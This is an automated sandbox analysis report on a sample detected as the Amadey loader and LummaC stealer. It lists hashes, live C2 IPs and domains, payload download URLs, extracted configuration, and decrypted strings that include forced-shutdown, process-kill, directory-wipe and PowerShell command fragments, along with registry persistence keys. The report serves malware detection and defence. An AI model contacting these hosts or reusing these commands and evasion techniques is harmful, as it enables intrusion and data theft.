Windows Analysis Report
dFVyelEPsf.exe

Overview

General Information

Sample name: dFVyelEPsf.exe
renamed because original name is a hash value
Original sample name: aa883f75bff0257a0fefd5d8d20c6297.exe
Analysis ID: 1612329
MD5: aa883f75bff0257a0fefd5d8d20c6297
SHA1: 3fb6e0f9349bab21030e8f7168cf74ea89567c97
SHA256: 50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced
Tags: Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: dFVyelEPsf.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.75/files/ReverseSheller/random.exe Avira URL Cloud: Label: malware
Source: suggestyuoz.biz Avira URL Cloud: Label: malware
Source: impolitewearr.biz Avira URL Cloud: Label: malware
Source: hoursuhouy.biz Avira URL Cloud: Label: malware
Source: https://suggestyuoz.biz/api Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php$v Avira URL Cloud: Label: malware
Source: https://pleasedcfrown.biz/apiG Avira URL Cloud: Label: malware
Source: pleasedcfrown.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php0b71f45034799d2e017bfe3d1482b# Avira URL Cloud: Label: malware
Source: https://lightdeerysua.biz/api Avira URL Cloud: Label: malware
Source: lightdeerysua.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpcodedl Avira URL Cloud: Label: malware
Source: edcatiofireeu.shop Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpded9 Avira URL Cloud: Label: malware
Source: affordtempyo.biz Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpUsers Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php8001 Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/rast333a/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~ Avira URL Cloud: Label: malware
Source: https://affordtempyo.biz/apiw Avira URL Cloud: Label: malware
Source: https://mixedrecipew.biz/api? Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php2001 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "edcatiofireeu.shop"], "Build id": "Jxy8Jp--new"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 64%
Multi AV Scanner detection for submitted file
Source: dFVyelEPsf.exe Virustotal: Detection: 61% Perma Link
Source: dFVyelEPsf.exe ReversingLabs: Detection: 64%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075542001\8dcfe9a593.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: dFVyelEPsf.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: 185.215.113.43
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: S-%lu-
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: abc3bc1985
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: skotes.exe
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Startup
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: rundll32
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Programs
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: %USERPROFILE%
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: cred.dll
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: clip.dll
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: http://
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: https://
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: /quiet
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: /Plugins/
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: &unit=
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: shell32.dll
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: kernel32.dll
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: GetNativeSystemInfo
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: ProgramData\
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: AVAST Software
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Kaspersky Lab
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Panda Security
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Doctor Web
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: 360TotalSecurity
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Bitdefender
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Norton
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Sophos
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Comodo
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: WinDefender
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: 0123456789
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: ------
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: ?scr=1
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: ComputerName
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: -unicode-
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: VideoID
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: ProductName
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: CurrentBuild
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: rundll32.exe
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: "taskkill /f /im "
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: " && timeout 1 && del
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: && Exit"
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: " && ren
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: Powershell.exe
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: shutdown -s -t 0
Source: 00000006.00000002.3929498121.0000000000B91000.00000040.00000001.01000000.00000007.sdmp String decryptor: random
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: pleasedcfrown.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: affordtempyo.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: mixedrecipew.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: hoursuhouy.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: suggestyuoz.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: lightdeerysua.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: toppyneedus.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: impolitewearr.biz
Source: 8.2.bd03a8025c.exe.9f70000.2.raw.unpack String decryptor: edcatiofireeu.shop
Uses 32bit PE files
Source: dFVyelEPsf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49943 version: TLS 1.2
Source: Binary string: BitLockerToGo.pdb source: bd03a8025c.exe, 00000008.00000002.2577492519.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: bd03a8025c.exe, 00000008.00000002.2577492519.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, eax 10_2_0069107B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, eax 10_2_0065ABC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh 10_2_0069158D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh 10_2_00691594
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 10_2_00657060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 10_2_00657060
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 10_2_00670070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [ebx], al 10_2_0067F049
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, eax 10_2_00691822
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], eax 10_2_0067F02B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], CD5A394Bh 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62582850h] 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-036FDCE6h] 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, edx 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CD5A394Bh 10_2_00693810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [edi+ebx] 10_2_00691968
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, ecx 10_2_0067F169
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 10_2_0067C970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-4ADF6EBDh] 10_2_00673150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea ebx, dword ptr [ecx+3Dh] 10_2_00673150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 10_2_00673150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then add ecx, esi 10_2_00678133
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 10_2_0066A138
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_0066C10F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], A0C7EB40h 10_2_006941C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, esi 10_2_0068C9D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, ecx 10_2_0067F1AA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, ecx 10_2_0067F1BC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh 10_2_00693240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebp, ecx 10_2_00671A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+000002B0h] 10_2_0066620E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx esi, byte ptr [eax] 10_2_0068FA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov esi, dword ptr [esp+3Ch] 10_2_0068FA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 8A6F5E24h 10_2_00667A1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov esi, ecx 10_2_00667A1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3BD3CC22h 10_2_00667A1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, ecx 10_2_0067EAFB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], ecx 10_2_006802C6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [ebx], al 10_2_006802C6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [esi+edx-025DAA51h] 10_2_0065E2DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [esi], ax 10_2_0066D290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push eax 10_2_00676327
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], A0C7EB40h 10_2_00694330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+7B0208D6h] 10_2_006593E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-65A4DBB6h] 10_2_00672BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h 10_2_00672BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ebp+00h], cx 10_2_00672BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, ecx 10_2_0068D3AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 10_2_00669440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov esi, D67B0372h 10_2_00679425
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh 10_2_0066A4C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C8B478E8h 10_2_0066A4C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [edx+eax] 10_2_0065D481
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ecx], ax 10_2_0065D481
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [edi], cx 10_2_0065D481
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 10_2_00678490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [eax+ecx+5BEE3310h] 10_2_0067BD68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, eax 10_2_0067F545
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], eax 10_2_0067F545
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 10_2_00688D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], cl 10_2_0065DD4B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh 10_2_0067C55C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 10_2_0067DD30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h 10_2_00693500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62582850h] 10_2_00693500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62582850h] 10_2_00693500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, dword ptr [esi+50h] 10_2_0065EDF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], 36E63855h 10_2_0068F5C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 10_2_00692DC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], eax 10_2_0067F02B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-579FD997h] 10_2_0066BE65
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-79h] 10_2_0068C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 10_2_0066CED4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ebx], cx 10_2_0066CED4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2Bh] 10_2_0066C6D8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, eax 10_2_0069177E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2277EDDDh] 10_2_00678F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx+61A20EE9h] 10_2_00678F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], C8B478E8h 10_2_00678F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [edi+eax] 10_2_0067A732
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea eax, dword ptr [eax+eax*4] 10_2_00657F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edx-15h] 10_2_0067EF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push edi 10_2_00671F13
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, ecx 10_2_00690FAB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax-3181519Bh] 10_2_006907B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_0066C36D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_0066C36D

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49714 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49745 -> 185.215.113.43:80
